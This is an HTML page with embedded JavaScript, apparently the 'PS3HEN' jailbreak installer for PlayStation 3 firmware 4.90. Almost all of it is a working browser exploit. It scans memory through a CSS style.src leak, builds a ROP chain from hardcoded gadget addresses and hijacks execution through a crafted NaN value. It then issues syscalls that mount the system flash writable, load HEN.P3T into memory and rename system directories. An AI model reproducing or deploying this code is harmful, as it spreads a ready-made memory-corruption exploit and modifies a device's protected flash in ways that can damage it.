<title>PS3HEN Installer</title>
<center>
<h1>Auto HEN Installer (4.90 HFW)</h1>
<hr>
<div id="result"></div>
<div id="exploit"></div>
<div id="trigger" style="display: none;"></div>
<script>
var sf_swap_addr=0x2339711,xtra_data,stack_frame,jump_2,jump_1,xtra_data_addr,stack_frame_addr,jump_2_addr,jump_1_addr,offset_array=[],t_out=0,search_max_threshold,search_base,search_size,search_base_off=0,search_size_ext=0,gtemp_addr=0x8D000000,total_loops=0,max_loops=20,frame_fails=0,sp_exit=0x8FD8DCC0,ffs=4294967295,dbyte41=16705,dbyte00=0,byte_size=1,hword_size=2,word_size=4,dword_size=8,mbytes=1048576,stat_size_offset=40,toc_addr=0x6F5558,gadget1_addr=0x097604,gadget8_addr=0x020000,gadget_mod1_addr=0x60EFD0,gadget_mod2_addr=0x013B74,gadget_mod3_addr=0x0B8E00,gadget_mod4b_addr=0x42C774,gadget_mod4c_addr=0x054AF0,gadget_mod9_addr=0x010B20,gadget_mod4a_addr=0x0D9684,gadget_mod7_addr=0x01A6AC,gadget_mod8_addr=0x2BACB4,gadget12_addr=0x0C864C,ua = navigator.userAgent,fwv = ua.substring(ua.indexOf("5.0 (") + 19, ua.indexOf(") Apple")),base_file="/dev_hdd0/theme/HEN.P3T",fail_msg_frag="<h2><span style='color:red'>Initialization failed. Close the browser and try again.</span></h2>",progress_msg_frag1="<h2>Initializing... ",progress_msg_frag2='%</h2>',flash_partition='xxxxCELL_FS_IOS:BUILTIN_FLSH1',filesystem='CELL_FS_FAT',mount_path='/dev_blind',gadget9_addr=0x029B08,gadget10_addr=0x62E01C,gadget11_addr=0x59A4AC,gadget12_addr=0x0C864C,gadget13_addr=0x48E5A4,gadget14_addr=0x48C79C,gadget15_addr=0x489C84,gadget_mod1_addr=0x60EFD0,gadget_mod2_addr=0x013B74,gadget_mod3_addr=0x0B8E00,gadget_mod4a_addr=0x0D9684,gadget_mod4b_addr=0x42C774,gadget_mod4c_addr=0x054AF0,gadget_mod5_addr=0x4238D8,gadget_mod6_addr=0x020C00,gadget_mod7_addr=0x01A6AC,gadget_mod8_addr=0x2BACB4,gadget_mod9_addr=0x010B20,gadget_mod10_addr=0x1C5794,gadget_mod11_addr=0x18B144,gadget_mod12_addr=0x6331F4,gadget_mod13_addr=0x33686C,gadget_mod14_addr=0x6338F8,gadget_mod15_addr=0x39D034,gadget_mod16_addr=0x4F7328;
function store_word(store_offset,val,r29out,r30out,r31out)
{
	r29out=gtemp_addr;
	r30out=gtemp_addr;
	r31out=gtemp_addr;
	return hexdw2bin(gadget_mod3_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(val)+fill_by_8bytes(0x8,dbyte41)+hexdw2bin(store_offset-0xC74)+fill_by_16bytes(0x10,dbyte41)
	+hexdw2bin(gadget_mod7_addr)+fill_by_16bytes(0x70,dbyte41)+hexdw2bin(r29out)+hexdw2bin(r30out)+hexdw2bin(r31out)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41);
}
function s2hex(str)
{
    var hex = [];
    var  i = 0;
    for (;i < str.length; i++) {
        hex.push(hex16(str.charCodeAt(i).toString(16)));
    }
    return hex.join("");
}
function hex16(s)
{
    return ('0000' + s).slice(-4)
}
function stack_frame_swap(new_stack_addr)
{
	return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+hexdw2bin(new_stack_addr)+fill_by_8bytes(0x8,dbyte41)+hexdw2bin(gadget_mod9_addr);
}
function showMsg(str)
{
	document.getElementById('result').innerHTML=str;
}
function syscall_r3_p2p(sc,r3_ptr,r4,r5,r6,r7,r8,r9,r10,r31out)
{
	if(r31out===null){r31out=gtemp_addr;}
	return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)
	+hexw2bin(sc)+hexw2bin(r10)+hexw2bin(r8)+hexw2bin(r7)+hexw2bin(r6)+hexw2bin(r5)+hexw2bin(r4)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(r9)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(r3_ptr)
	+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4b_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(r31out)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41);
}
function syscall_r3r5_p2p(sc,r3_ptr,r4,r5_ptr,r6,r7,r8,r9,r10,r31out)
{
	if(r31out===null){r31out=gtemp_addr;}
	return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)
	+hexw2bin(sc)+hexw2bin(r10)+hexw2bin(r8)+hexw2bin(r7)+hexw2bin(r6)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(r4)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(r9)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(r5_ptr-0x4)+hexdw2bin(gtemp_addr)+fill_by_8bytes(0x18,dbyte41)
	+hexdw2bin(gadget_mod4c_addr)+fill_by_16bytes(0xB0,dbyte41)+hexdw2bin(r3_ptr)+fill_by_16bytes(0x10,dbyte41)
	+hexdw2bin(gadget_mod4b_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(r31out)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41);
}
function hexh2bin(hex_val)
{
	return String.fromCharCode(hex_val);
}
function hexw2bin(hex_val)
{
	return String.fromCharCode(hex_val >> 16) + String.fromCharCode(hex_val);
}
function hexdw2bin(hex_val)
{
	return hexw2bin(0) + hexw2bin(hex_val);
}
String.prototype.toHex16 = function()
{
	return ('0000' + this).substr(-4);
};
String.prototype.toAscii = function(hex_16)
{
    var ascii='';
	var i=0;
	while(i<this.length){if(hex_16===true){ascii += this.charCodeAt(i).toString(16).toHex16();} else {ascii += this.charCodeAt(i).toString(16);}i+=1;}
	return ascii;
};
String.prototype.convert=function(ascii)
{
	if(this.length<1){return '';}
	var asciistr='';var asciichr='';var i=0;var ret=[];
	if(ascii===true){asciistr = this;}
	else {asciistr = this.toAscii();}
	while((asciistr.length%4)!==0){asciistr+='00';}
	if(asciistr.substr(asciistr.length-3,2)!=='00'){asciistr+='0000';}
    while(i<asciistr.length){
		asciichr = asciistr.substr(i, 4);
		ret.push(String.fromCharCode(parseInt(asciichr, 16)));
		i+=4;
    }
    return ret.join('');
};
String.prototype.convertedSize = function(ascii)
{
	if(this.length<1){return 0;}
	var asciistr='';
	if(ascii===true){asciistr=this;}
	else {asciistr = this.toAscii();}
	while((asciistr.length%4)!==0){asciistr+='00';}
	if(asciistr.substr(asciistr.length-3,2)!=='00'){asciistr+='0000';}
	return asciistr.length/2;
};
String.prototype.replaceAt=function(index, ch)
{
	return this.substr(0,index)+ch+this.substr(index+ch.length);
};
String.prototype.repeat = function(num)
{
    return new Array(num+1).join(this);
};
Number.prototype.noExponents=function()
{
    var data= String(this).split(/[eE]/);
    if(data.length===1) {return data[0];}
    var  z= '', sign= this<0? '-':'',
    str= data[0].replace('.', ''),
    mag= Number(data[1])+ 1;
    if(mag<0){
        z= sign+'0.';
        while(mag++){z+='0';}
        return z+str.replace(/^\-/,'');
    }
    mag -= str.length;  
    while(mag--) {z += '0';}
    return str + z;
};
function fromIEEE754(bytes, ebits, fbits)
{
	var retNumber=0;
	var bits=[];
	var i;
	var j;
	var byte;
	for (i=bytes.length;i;i-=1)
	{
		byte=bytes[i-1];
		for(j=8;j;j-=1)
		{
			bits.push(byte % 2 ? 1 : 0); byte = byte >> 1;
		}
	}
	bits.reverse();
	var str = bits.join('');
	var bias = (1 << (ebits - 1)) - 1;
	var s = parseInt(str.substring(0, 1), 2) ? -1 : 1;
	var e = parseInt(str.substring(1, 1 + ebits), 2);
	var f = parseInt(str.substring(1 + ebits), 2);
	if (e === (1 << ebits) - 1)
	{
		retNumber = f !== 0 ? NaN : s * Infinity;
	}
	else if (e > 0)
	{
		retNumber = s * Math.pow(2, e - bias) * (1 + f / Math.pow(2, fbits));
	}
	else if (f !== 0)
	{
		retNumber = s * Math.pow(2, -(bias-1)) * (f / Math.pow(2, fbits));
	}
	else
	{
		retNumber = s * 0;
	}
	return retNumber.noExponents();
}
function generateIEEE754(address, size)
{
	var hex = new Array
	(
		(address >> 24) & 0xFF,
		(address >> 16) & 0xFF,
		(address >> 8) & 0xFF,
		(address) & 0xFF,
		
		(size >> 24) & 0xFF,
		(size >> 16) & 0xFF,
		(size >> 8) & 0xFF,
		(size) & 0xFF
	);
	return fromIEEE754(hex, 11, 52);
}
function generateExploit(address, size)
{
	var n = (address<<32) | ((size>>1)-1);
	return generateIEEE754(address, (n-address));
}
function readMemory(address, size)
{
	if(document.getElementById('exploit')){document.getElementById('exploit').style.src = "local(" + generateExploit(address, size) + ")";}
}
function checkMemory(address, size, len)
{
	if(document.getElementById('exploit'))
	{
		readMemory(address, size);
		return document.getElementById('exploit').style.src.substr(6,len);
	}
}
function trigger(exploit_addr){
	if(document.getElementById('trigger')){document.getElementById("trigger").innerHTML = -parseFloat("NAN(ffffe" + exploit_addr.toString(16) + ")");}
	if (document.getElementById('trigger').innerHTML.indexOf("NaN") != -1){HFWmsg();}
}
function load_check()
{
	if(total_loops<max_loops)
	{
		showMsg(progress_msg_frag1+((100/max_loops)*total_loops).toString()+progress_msg_frag2);
		t_out=setTimeout(initROP,100,false);
	}
	else
	{
		total_loops=0;
		showMsg(fail_msg_frag);
		t_out=0;
	}
}
function findJsVariableOffset(name,exploit_data,base,size,end)
{
    var block = 0;
    while((base + block * size) < end)
    {
        readMemory(base + block * size, size);
        var offset = document.getElementById('exploit').style.src.substr(6,size).indexOf(exploit_data);
        if(offset > 0)
        {
            return base + block * size + (offset * 2) + 4;
        }
        
        block++;
    }
    return 0;
}
function stack_frame_hookup()
{
	return unescape("\u4141\u2A2F")+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(toc_addr)+fill_by_16bytes(0x70,dbyte41);
}
function stack_frame_exit()
{
	return hexdw2bin(gadget_mod8_addr)+unescape("\u2F2A");
}
function syscall(sc,r3,r4,r5,r6,r7,r8,r9,r10,r31out)
{
	if(r31out===null){r31out=gtemp_addr;}
	return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(sc)+hexw2bin(r10)
	+hexw2bin(r8)+hexw2bin(r7)+hexw2bin(r6)+hexw2bin(r5)+hexw2bin(r4)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(r9)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(r3)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)
	+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4a_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(r31out)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41);
}
function fill_by_4bytes(nbytes,hex_val)
{
	var stemp='';var iterator=0;var tmp=hexh2bin(hex_val);
	while(iterator<nbytes/4){stemp+=tmp.repeat(2);iterator++;}
	return stemp;
}
function fill_by_8bytes(nbytes,hex_val)
{
	var stemp='';var iterator=0;var tmp=hexh2bin(hex_val);
	while(iterator<nbytes/8){stemp+=tmp.repeat(4);iterator++;}
	return stemp;
}
function fill_by_16bytes(nbytes,hex_val)
{
	var stemp='';var iterator=0;var tmp=hexh2bin(hex_val);
	while(iterator<nbytes/16){stemp+=tmp.repeat(8);iterator++;}
	return stemp;
}
function initROP(init)
{
	try
	{
		if(init===true){frame_fails=0;search_base_off=0;search_size_ext=0;}
		if(t_out!==0){clearTimeout(t_out);t_out=0;}
		offset_array=[];
		xtra_data_addr=0;
		stack_frame_addr=0;
		jump_2_addr=0;
		jump_1_addr=0;
		var base_file_addr=0,index_key_addr=0,search_max_threshold=70*0x100000,search_base=0x80100000,search_size=2*mbytes;
		search_size_ext=0*mbytes;
		search_base_off=0*mbytes;
		total_loops++;

		xtra_data="xxxx".convert()
		+flash_partition.convert()
		+base_file.convert()
		+filesystem.convert()
		+mount_path.convert()
		// Only needed for HEN directories
		+unescape("\u0000\u0000")
		+"/dev_blind/vsh/resource/silk/xai/widgets/informationboard".convert()
		+"/dev_blind/vsh/resource/silk/xai/widgets".convert()
		+"/dev_blind/vsh/resource/silk/xai".convert()
		+"/dev_blind/vsh/resource/AAA".convert()
		+unescape("\uFD7E");

		while(xtra_data_addr===0)
		{
			if(search_max_threshold<search_size){load_check();return;}
			xtra_data=xtra_data.replaceAt(0,hexh2bin(0x7EFD));
			xtra_data_addr=findJsVariableOffset("xtra_data",xtra_data,search_base,search_size,search_base+search_max_threshold);
			search_max_threshold-=search_size;
		}

		flash_partition_addr=xtra_data_addr+0x6;
		base_file_addr=flash_partition_addr+flash_partition.convertedSize()-0x4;
		fs_addr=base_file_addr+base_file.convertedSize();
		mount_path_addr=fs_addr+filesystem.convertedSize();

		hen_renamedir_addr1=xtra_data_addr+0x5A;
		hen_renamedir_addr2=xtra_data_addr+0x96;
		hen_renamedir_addr3=xtra_data_addr+0xC0;
		hen_renamedir_addr4=xtra_data_addr+0xE2;

		stack_frame=stack_frame_hookup()
		+syscall(0x345,flash_partition_addr,fs_addr,mount_path_addr,0,0,0,0,0)
		+store_word(0x8a000004+sf_swap_addr,sp_exit)
		+store_word(0x8a000014+sf_swap_addr,gadget_mod8_addr)
		+syscall(0x321,base_file_addr,0x0,0x8e000000,0,0,0,0,0)
		+syscall_r3r5_p2p(0x322,0x8e000000,0x8a000000,0x11000,0x8e000008,0,0,0,0,0,0)
		+syscall(0x32E,base_file_addr,0,0,0,0,0,0,0)

		// Must be changed depending on external stack frame (HEN only)
		+syscall(0x32C,hen_renamedir_addr1,0x8A000000+0x2339450,0,0,0,0,0,0) // /dev_blind/hen
		+syscall(0x32C,hen_renamedir_addr2,0x8A000000+0x233946E,0,0,0,0,0,0) // /dev_blind/hen/xml
		//+syscall(0x32C,hen_renamedir_addr3,0x8A000000+0x22E82DB,0,0,0,0,0,0) // /dev_blind/vsh/resource/AAA
		//+syscall(0x32C,hen_renamedir_addr4,0x8a000000+0x1C25A8A,0,0,0,0,0,0) // /dev_blind/hen/remap/xml

		+stack_frame_swap(0x8a000000+sf_swap_addr)
		+stack_frame_exit();

		while(stack_frame_addr===0)
		{
			if(search_max_threshold<search_size+search_size_ext){frame_fails++;if((frame_fails%10)===0){search_base_off+=0;search_size_ext+=0;}load_check();return;}
			stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));
			stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+search_base_off,search_size+search_size_ext,search_base+search_max_threshold);
			if(stack_frame_addr==-1)if(search_max_threshold<search_size+search_size_ext){frame_fails++;load_check();return;}
			search_max_threshold-=search_size+search_size_ext;
		}

		jump_2=unescape("\u0102\u7EFB")+fill_by_16bytes(0x30,0x8282)+hexw2bin(stack_frame_addr)+unescape("\uFB7E");		
		while(jump_2_addr===0)
		{
			if(search_max_threshold<search_size){load_check();return;}
			jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));
			jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size,search_base+search_max_threshold);
			if(jump_2_addr==-1)if(search_max_threshold<search_size){load_check();return;}
			search_max_threshold-=search_size;
		}

		jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");
		while(jump_1_addr===0)
		{
			if(search_max_threshold<search_size){load_check();return;}
			jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));
			jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size,search_base+search_max_threshold);
			if(jump_1_addr==-1)if(search_max_threshold<search_size){load_check();return;}
			search_max_threshold-=search_size;
		}

		var sf=checkMemory(stack_frame_addr-0x4,0x10000,stack_frame.length);
		var x=checkMemory(xtra_data_addr-0x4,0x2000,xtra_data.length);
		var j2=checkMemory(jump_2_addr-0x4,0x2000,jump_2.length);
		var j1=checkMemory(jump_1_addr-0x4,0x2000,jump_1.length);

		if((j2===jump_2)&&(j1===jump_1)&&(x===xtra_data)&&(sf===stack_frame))
		{
			if(t_out!==0){clearTimeout(t_out);}
			showMsg('<h2>Downloading setup file...</h2>');
			window.location.href = 'HEN.P3T';
			setTimeout(listener,1500);
		}
		else
		{
			load_check();
		}
	}
	catch(e)
	{

	}
}
function listener()
{
	var myListener = function ()
	{
		document.removeEventListener('mousemove', myListener, false);
		showMsg('<h2>Installing HEN, please wait...</h2>');
		triggerX();
	};
	document.addEventListener('mousemove', myListener, false);
}
function triggerX()
{
	setTimeout(trigger,50,jump_1_addr);
	setTimeout(showMsg,2000,"<h2><span style='color:red'>Failed to load setup file. Close the browser and try again.</span></h2>");
	t_out=0;
	total_loops=0;
}
function HFWmsg()
{
	showMsg("<h2><span style='color:red'>You must install Hybrid Firmware (HFW) 4.90 before installing HEN!</h2></span>");
	throw new Error('');
}
if(fwv=="4.90"){initROP(true)}else{HFWmsg()}
</script>